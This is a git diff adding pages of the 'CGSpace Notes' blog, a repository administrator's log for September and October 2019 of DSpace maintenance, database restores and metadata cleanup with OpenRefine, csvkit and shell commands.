+<li>Like earliert this year, I see the following error in the Cocoon log while browsing:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2019-09-15 15:32:18,137 WARN  org.apache.cocoon.components.xslt.TraxErrorListener  - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
+</code></pre><ul>
+<li>Around the same time I see the following in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2019-09-15 15:32:18,079 INFO  org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644 
+2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&#34;METSRIGHTS&#34;
+</code></pre><ul>
+<li>I see a lot of these errors today, but not earlier this month:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;Cannot find named plugin&#39; dspace.log.2019-09-*
+dspace.log.2019-09-01:0
+dspace.log.2019-09-02:0
+dspace.log.2019-09-03:0
+dspace.log.2019-09-04:0
+dspace.log.2019-09-05:0
+dspace.log.2019-09-06:0
+dspace.log.2019-09-07:0
+dspace.log.2019-09-08:0
+dspace.log.2019-09-09:0
+dspace.log.2019-09-10:0
+dspace.log.2019-09-11:0
+dspace.log.2019-09-12:0
+dspace.log.2019-09-13:0
+dspace.log.2019-09-14:0
+dspace.log.2019-09-15:808
+</code></pre><ul>
+<li>Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:</li>
+</ul>
+<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.METSRightsCrosswalk&#34;, name=&#34;METSRIGHTS&#34;
+2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.OREDisseminationCrosswalk&#34;, name=&#34;ore&#34;
+2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&#34;, name=&#34;dim&#34;
+</code></pre><ul>
+<li>I restarted Tomcat and the item views came back, but then the Solr statistics cores didn&rsquo;t all load properly
+<ul>
+<li>After restarting Tomcat once again, both the item views and the Solr statistics cores all came back OK</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-19">2019-09-19</h2>
+<ul>
+<li>For some reason my podman PostgreSQL container isn&rsquo;t working so I had to use Docker to re-create it for my testing work today:</li>
+</ul>
+<pre tabindex="0"><code># docker pull docker.io/library/postgres:9.6-alpine
+# docker create volume dspacedb_data
+# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+</code></pre><ul>
+<li>Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications
+<ul>
+<li>I manually checked the ORCID profile links to make sure they matched the names</li>
+<li>Then I created an input file to use with my <code>add-orcid-identifiers-csv.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Kihara, Job&#34;,&#34;Job Kihara: 0000-0002-4394-9553&#34;
+&#34;Twyman, Jennifer&#34;,&#34;Jennifer Twyman: 0000-0002-8581-5668&#34;
+&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
+&#34;Arango, Jacobo&#34;,&#34;Jacobo Arango: 0000-0002-4828-9398&#34;
+&#34;Chavarriaga Aguirre, Paul&#34;,&#34;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&#34;
+&#34;Paul, Birthe&#34;,&#34;Birthe Paul: 0000-0002-5994-5354&#34;
+&#34;Eitzinger, Anton&#34;,&#34;Anton Eitzinger: 0000-0001-7317-3381&#34;
+&#34;Hoek, Rein van der&#34;,&#34;Rein van der Hoek: 0000-0003-4528-7669&#34;
+&#34;Aranzales Rondón, Ericson&#34;,&#34;Ericson Aranzales Rondon: 0000-0001-7487-9909&#34;
+&#34;Staiger-Rivas, Simone&#34;,&#34;Simone Staiger: 0000-0002-3539-0817&#34;
+&#34;de Haan, Stef&#34;,&#34;Stef de Haan: 0000-0001-8690-1886&#34;
+&#34;Pulleman, Mirjam&#34;,&#34;Mirjam Pulleman: 0000-0001-9950-0176&#34;
+&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
+&#34;Tamene, Lulseged&#34;,&#34;Lulseged Tamene: 0000-0002-3806-8890&#34;
+&#34;Andrieu, Nadine&#34;,&#34;Nadine Andrieu: 0000-0001-9558-9302&#34;
+&#34;Ramírez-Villegas, Julián&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
+</code></pre><ul>
+<li>I tested the file on my local development machine with the following invocation:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>In my test environment this added 390 ORCID identifier</li>
+<li>I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update</li>
+<li>Update the PostgreSQL JDBC driver to version 42.2.8 in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>
+<ul>
+<li>There is only <a href="https://github.com/pgjdbc/pgjdbc/issues/1567">one minor fix to a usecase we aren&rsquo;t using</a> so I will deploy this on the servers the next time I do updates</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+<li>Start looking at IITA&rsquo;s latest round of batch updates that Sisay had <a href="https://dspacetest.cgiar.org/handle/10568/105486">uploaded to DSpace Test</a> earlier this month
+<ul>
+<li>For posterity, IITA&rsquo;s original input file was 20196th.xls and Sisay uploaded it as &ldquo;IITA_Sep_06&rdquo; to DSpace Test</li>
+<li>Sisay said he did ran the csv-metadata-quality script on the records, but I assume he didn&rsquo;t run the unsafe fixes or AGROVOC checks because I still see unneccessary Unicode, excessive whitespace, one invalid ISBN, missing dates and a few invalid AGROVOC fields</li>
+<li>In addition, a few records were missing authorship type</li>
+<li>I deleted two invalid AGROVOC terms because they were ambiguous</li>
+<li>Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new colum and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+<li>I also looked through the IITA subjects to normalize some values</li>
+</ul>
+</li>
+<li>Follow up with Marissa again about the CCAFS phase II project tags</li>
+<li>Generate a list of the top 1500 authors on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
+</code></pre><ul>
+<li>Then I used <code>csvcut</code> to select the column of author names, strip the header and quote characters, and saved the sorted file:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed &#39;s/&#34;//g&#39; | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
+</code></pre><ul>
+<li>After adding the XML formatting back to the file I formatted it using XML tidy:</li>
+</ul>
+<pre tabindex="0"><code>$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
+</code></pre><ul>
+<li>I created and merged <a href="https://github.com/ilri/DSpace/pull/433">a pull request for the updates</a>
+<ul>
+<li>This is the first time we&rsquo;ve updated this controlled vocabulary since 2018-09</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-20">2019-09-20</h2>
+<ul>
+<li>Deploy a fresh snapshot of CGSpace&rsquo;s PostgreSQL database on DSpace Test so we can get more accurate duplicate checking with the upcoming Bioversity and IITA migrations</li>
+<li>Skype with Carol and Francesca to discuss the Bioveristy migration to CGSpace
+<ul>
+<li>They want to do some enrichment of the metadata to add countries and regions</li>
+<li>Also, they noticed that some items have a blank ISSN in the citation like &ldquo;ISSN:&rdquo;</li>
+<li>I told them it&rsquo;s probably best if we have Francesco produce a new export from Typo 3</li>
+<li>But on second thought I think that I&rsquo;ve already done so much work on this file as it is that I should fix what I can here and then do a new import to DSpace Test with the PDFs</li>
+<li>Other corrections would be to replace &ldquo;Inst.&rdquo; and &ldquo;Instit.&rdquo; with &ldquo;Institute&rdquo; and remove those blank ISSNs from the citations</li>
+<li>I will rename the files with multiple underscores so they match the filename column in the CSV using this command:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ perl-rename -n &#39;s/_{2,3}/_/g&#39; *.pdf
+</code></pre><ul>
+<li>I was going preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
+<ul>
+<li>There are a <em>few dozen</em> that have completely fucked up names due to some encoding error</li>
+<li>To make matters worse, when I tried to download them, some of the links in the &ldquo;URL&rdquo; column that Francesco included are wrong, so I had to go to the permalink and get a link that worked</li>
+<li>After downloading everything I had to use Ubuntu&rsquo;s version of rename to get rid of all the double and triple underscores:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ rename -v &#39;s/___/_/g&#39;  *.pdf
+$ rename -v &#39;s/__/_/g&#39;  *.pdf
+</code></pre><ul>
+<li>I&rsquo;m still waiting to hear what Carol and Francesca want to do with the <code>1195.pdf.LCK</code> file (for now I&rsquo;ve removed it from the CSV, but for future reference it has the number 630 in its permalink)</li>
+<li>I wrote two fairly long GREL expressions to clean up the institutional author names in the <code>dc.contributor.author</code> and <code>dc.identifier.citation</code> fields using OpenRefine
+<ul>
+<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&rdquo;:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&#34;&#34;)
+</code></pre><ul>
+<li>The second targets cities and countries after names like &ldquo;International Livestock Research Intstitute, Kenya&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&#34;&#34;)
+</code></pre><ul>
+<li>I imported the 1,427 Bioversity records with bitstreams to a new collection called <a href="https://dspacetest.cgiar.org/handle/10568/103688">2019-09-20 Bioversity Migration Test</a> on DSpace Test (after splitting them in two batches of about 700 each):</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx768m&#39;
+$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
+$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
+</code></pre><ul>
+<li>After that I exported the collection again and started doing some quality checks and cleanups:
+<ul>
+<li>Change all DOIs to use <a href="https://doi.org">https://doi.org</a> format</li>
+<li>Change all bioversityinternational.org links to use https://</li>
+<li>Fix ten authors with invalid names like &ldquo;Orth,.&rdquo; by checking the correct name in the citation</li>
+<li>Fix several invalid ISBNs, but there are several more that contain incorrect ISBNs in their PDFs!</li>
+<li>Fix some citations that were using &ldquo;ISSN&rdquo; instead of ISBN</li>
+</ul>
+</li>
+<li>The next steps are:
+<ul>
+<li>Check for duplicates</li>
+<li>Continue with institutional author normalization</li>
+<li>Ask which collection to map items with type Brochure, Journal Item, and Thesis?</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-21">2019-09-21</h2>
+<ul>
+<li>Re-upload the <a href="https://dspacetest.cgiar.org/handle/10568/105116">IITA Sept 6 (20196th.xls) records to DSpace Test</a> after I did the re-sync yesterday
+<ul>
+<li>Then I looked at the records again and sent some feedback about three duplicates to Bosede</li>
+<li>Also I noticed that many journal articles have the journal and page information in the citation, but are missing <code>dc.source</code> and <code>dc.format.extent</code> fields</li>
+</ul>
+</li>
+<li>Play with language identification using the langdetect, fasttext, polyglot, and langid libraries
+<ul>
+<li>ployglot requires too many system things to compile</li>
+<li>langdetect didn&rsquo;t seem as accurate as the others</li>
+<li>fasttext is likely the best, but <a href="https://github.com/facebookresearch/fastText/issues/909">prints a blank link to the console when loading a model</a></li>
+<li>langid seems to be the best considering the above experiences</li>
+</ul>
+</li>
+<li>I added very experimental language detection to the <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> module
+<ul>
+<li>It works by checking the predicted language of the <code>dc.title</code> field against the item&rsquo;s <code>dc.language.iso</code> field</li>
+<li>I tested it on the Bioversity migration data set and it actually helped me correct eleven language fields in their records!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-24">2019-09-24</h2>
+<ul>
+<li>Bosede fixed a few of the things I mentioned in her Sept 6 batch records, but there were still issues
+<ul>
+<li>I sent her a bit more feedback because when I asked her to delete a duplicate, she deleted the <em>existing</em> item on DSpace Test rather than the new one in the new batch file!</li>
+<li>I fixed two incorrect languages after analyzing it with my beta language detection in the csv-metadata-quality tool</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-26">2019-09-26</h2>
+<ul>
+<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.0">version 0.3.0 of the csv-metadata-quality</a> tool
+<ul>
+<li>This version includes the experimental validation of languages using the Python <code>langid</code> library</li>
+<li>I also included updated pytest tests and test files that specifically test this functionality</li>
+</ul>
+</li>
+<li>Give more feedback to Bosede about the <a href="https://dspacetest.cgiar.org/handle/10568/105116">IITA Sept 6 (20196th.xls) records on DSpace Test</a>
+<ul>
+<li>I told her to delete one item that appears to be a duplicate, or to fix its citation to be correct if she thinks it is not a duplicate</li>
+<li>I deleted another item that I had previously identified as a duplicate that she had fixed by incorrectly deleting the original (ugh)</li>
+</ul>
+</li>
+<li>Get a list of institutions from CCAFS&rsquo;s Clarisa API and try to parse it with <code>jq</code>, do some small cleanups and add a header in <code>sed</code>, and then pass it through <code>csvcut</code> to add line numbers:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
+$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
+</code></pre><ul>
+<li>The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode</li>
+<li>I could potentially use this with reconcile-csv and OpenRefine as a source to validate our institutional authors against&hellip;</li>
+</ul>
+<h2 id="2019-09-27">2019-09-27</h2>
+<ul>
+<li>Skype with Peter and Abenet about CGSpace actions
+<ul>
+<li>Peter will respond to ICARDA&rsquo;s request to deposit items in to CGSpace, with a caveat that we agree on some vocabulary standards for institutions, countries, regions, etc</li>
+<li>We discussed using ISO 3166 for countries, though Peter doesn&rsquo;t like the formal names like &ldquo;Moldova, Republic of&rdquo; and &ldquo;Tanzania, United Republic of&rdquo;
+<ul>
+<li>The Debian <code>iso-codes</code> package has ISO 3166-1 with &ldquo;common name&rdquo;, &ldquo;name&rdquo;, and &ldquo;official name&rdquo; representations, for example:
+<ul>
+<li>common_name: Tanzania</li>
+<li>name: Tanzania, United Republic of</li>
+<li>official_name: United Republic of Tanzania</li>
+</ul>
+</li>
+<li>There are still some unfortunate ones there, though:
+<ul>
+<li>name: Korea, Democratic People&rsquo;s Republic of</li>
+<li>official_name: Democratic People&rsquo;s Republic of Korea</li>
+</ul>
+</li>
+<li>And this, which isn&rsquo;t even in English&hellip;
+<ul>
+<li>name: Côte d&rsquo;Ivoire</li>
+<li>official_name: Republic of Côte d&rsquo;Ivoire</li>
+</ul>
+</li>
+<li>The other alternative is to just keep using the names we have, which are mostly compliant with AGROVOC</li>
+</ul>
+</li>
+<li>Peter said that a new server for DSpace Test is fine, so I can proceed with the normal process of getting approval from Michael Victor and ICT when I have time (recommend moving from $40 to $80/month Linode, with 16GB RAM)</li>
+<li>I need to ask Atmire for a quote to upgrade CGSpace to DSpace 6 with all current modules so we can see how many more credits we need</li>
+</ul>
+</li>
+<li>A little bit more work on the Sept 6 IITA batch records
+<ul>
+<li>Bosede deleted the one item that I told her was a duplicate</li>
+<li>I checked the AGROVOC subjects and fixed one incorrect one</li>
+<li>Then I told her that I think the items are ready to go to CGSpace and asked Abenet for a final comment</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-10/index.html b/docs/2019-10/index.html
new file mode 100644
index 000000000..91ff23024
--- /dev/null
+++ b/docs/2019-10/index.html
@@ -0,0 +1,439 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2019" />
+<meta property="og:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-10/" />
+<meta property="article:published_time" content="2019-10-01T13:20:51+03:00" />
+<meta property="article:modified_time" content="2019-10-29T17:41:17+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2019"/>
+<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-10/",
+  "wordCount": "1800",
+  "datePublished": "2019-10-01T13:20:51+03:00",
+  "dateModified": "2019-10-29T17:41:17+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-10/">
+
+    <title>October, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-10/">October, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-10-01">2019-10-01</h2>
+<ul>
+<li>Udana from IWMI asked me for a CSV export of their community on CGSpace
+<ul>
+<li>I exported it, but a quick run through the <code>csv-metadata-quality</code> tool shows that there are some low-hanging fruits we can fix before I send him the data</li>
+<li>I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c &#39;id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]&#39; ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
+</code></pre><ul>
+<li>Then I replace them in vim with <code>:% s/\%u00a0/ /g</code> because I can&rsquo;t figure out the correct sed syntax to do it directly from the pipe above</li>
+<li>I uploaded those to CGSpace and then re-exported the metadata</li>
+<li>Now that I think about it, I shouldn&rsquo;t be removing non-breaking spaces (U+00A0), I should be replacing them with normal spaces!</li>
+<li>I modified the script so it replaces the non-breaking spaces instead of removing them</li>
+<li>Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):</li>
+</ul>
+<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x &#39;dc.date.issued,dc.date.issued[],dc.date.issued[en_US]&#39; -u
+</code></pre><ul>
+<li>That fixed 153 items (unnecessary Unicode, duplicates, comma–space fixes, etc)</li>
+<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.1">version 0.3.1 of the csv-metadata-quality script</a> with the non-breaking spaces change</li>
+</ul>
+<h2 id="2019-10-03">2019-10-03</h2>
+<ul>
+<li>Upload the 117 IITA records that we had been working on last month (aka 20196th.xls aka Sept 6) to CGSpace</li>
+</ul>
+<h2 id="2019-10-04">2019-10-04</h2>
+<ul>
+<li>Create an account for Bioversity&rsquo;s ICT consultant Francesco on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p &#39;fffff&#39;
+</code></pre><ul>
+<li>Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
+<ul>
+<li>I suggested that if they still want to do value addition of those records (like adding countries, regions, etc) that they could maybe do it after we migrate the records to CGSpace</li>
+<li>Carol responded to tell me where to map the items with type Brochure, Journal Item, and Thesis, so I applied them to the <a href="https://dspacetest.cgiar.org/handle/10568/103688">collection on DSpace Test</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-06">2019-10-06</h2>
+<ul>
+<li>Hector from CCAFS responded about my feedback of their CLARISA API
+<ul>
+<li>He made some fixes to the metadata values they are using based on my feedback and said they are happy if we would use it</li>
+</ul>
+</li>
+<li>Gabriela from CIP asked me if it was possible to generate an RSS feed of items that have the CIP subject &ldquo;POTATO AGRI-FOOD SYSTEMS&rdquo;
+<ul>
+<li>I notice that there is a similar term &ldquo;SWEETPOTATO AGRI-FOOD SYSTEMS&rdquo; so I had to come up with a way to exclude that using the boolean &ldquo;AND NOT&rdquo; in the <a href="https://cgspace.cgiar.org/open-search/discover?query=cipsubject:POTATO%20AGRI%E2%80%90FOOD%20SYSTEMS%20AND%20NOT%20cipsubject:SWEETPOTATO%20AGRI%E2%80%90FOOD%20SYSTEMS&amp;scope=10568/51671&amp;sort_by=3&amp;order=DESC">OpenSearch query</a></li>
+<li>Again, the <code>sort_by=3</code> parameter is the accession date, as configured in <code>dspace.cfg</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-08">2019-10-08</h2>
+<ul>
+<li>Fix 108 more issues with authors in the ongoing Bioversity migration on DSpace Test, for example:
+<ul>
+<li>Europeanooperative Programme for Plant Genetic Resources</li>
+<li>Bioversity International. Capacity Development Unit</li>
+<li>W.M. van der Heide, W.M., Tripp, R.</li>
+<li>Internationallant Genetic Resources Institute</li>
+</ul>
+</li>
+<li>Start looking at duplicates in the Bioversity migration data on DSpace Test
+<ul>
+<li>I&rsquo;m keeping track of the originals and duplicates in a Google Docs spreadsheet that I will share with Bioversity</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-10-09">2019-10-09</h2>
+<ul>
+<li>Continue working on identifying duplicates in the Bioversity migration
+<ul>
+<li>I have been recording the originals and duplicates in a spreadsheet so I can map them later</li>
+<li>For now I am just reconciling any incorrect or missing metadata in the original items on CGSpace, deleting the duplicate from DSpace Test, and mapping the original to the correct place on CGSpace</li>
+<li>So far I have deleted thirty duplicates and mapped fourteen</li>
+</ul>
+</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot the server</li>
+</ul>
+<h2 id="2019-10-10">2019-10-10</h2>
+<ul>
+<li>Felix Shaw from Earlham emailed me to ask about his admin account on DSpace Test
+<ul>
+<li>His old one got lost when I re-sync&rsquo;d DSpace Test with CGSpace a few weeks ago</li>
+<li>I added a new account for him and added it to the Administrators group:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
+</code></pre><h2 id="2019-10-11">2019-10-11</h2>
+<ul>
+<li>I ran the DSpace cleanup function on CGSpace and it found some errors:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
